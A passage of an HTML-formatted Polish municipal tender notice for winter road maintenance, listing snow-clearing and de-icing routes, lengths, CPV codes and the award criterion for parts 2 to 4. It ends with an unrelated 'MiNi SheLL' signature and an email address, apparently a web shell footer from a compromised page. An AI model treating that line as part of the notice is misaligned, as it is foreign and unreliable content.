Łączna długość dróg do zimowego utrzymania w zakresie odśnieżania : 34,0 km 
2)zwalczanie śliskości dróg gminnych i wewnętrznych na terenie sołectwa 
a)droga Orneta - Karkajmy - Bogatyńskie- 5,0 km 
b)droga do wsi Wojciechowo - 1,2 km 
c)droga do wsi Krosno- 1,1 km 
d)droga przez wieś Karbowo- 0,3 km 
Łączna długość dróg do zimowego utrzymania w zakresie zwalczania śliskości::7,6 km 
2.Szczegółowy opis i zakres przedmiotu zamówienia przedstawiony został w Szczegółowym opisie przedmiotu zamówienia Rozdziału III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rejon III obejmujący sołectwa: Bażyny, Dąbrówka, Drwęczno, Klusajny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres przedmiotu zamówienia obejmuje: 
1)odśnieżanie dróg gminnych i wewnętrznych na terenie sołectwa 
a)Bażyny- 18,5 km 
b)Dąbrówka- 1,0 km 
c)Drwęczno- 2,0 km 
d)Klusajny- 1,5 km 
Łączna długość dróg do zimowego utrzymania w zakresie odśnieżania : 23,0 km 
2.Szczegółowy opis i zakres przedmiotu zamówienia przedstawiony został w Szczegółowym opisie przedmiotu zamówienia Rozdziału III SIWZ...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rejon IV obejmujący sołectwa: Osetnik, Chwalęcin, Augustyny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres przedmiotu zamówienia obejmuje: 
1) odśnieżanie dróg gminnych i wewnętrznych na terenie sołectw 
a)Osetnik - 10,0 km 
b)Chwalęcin- 4,0 km 
c)Augustyny- 4,0 km 
Łączna długość dróg do zimowego utrzymania w zakresie odśnieżania: 18,0 km 
2.Szczegółowy opis i zakres przedmiotu zamówienia przedstawiony został w Szczegółowym opisie przedmiotu zamówienia Rozdziału III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com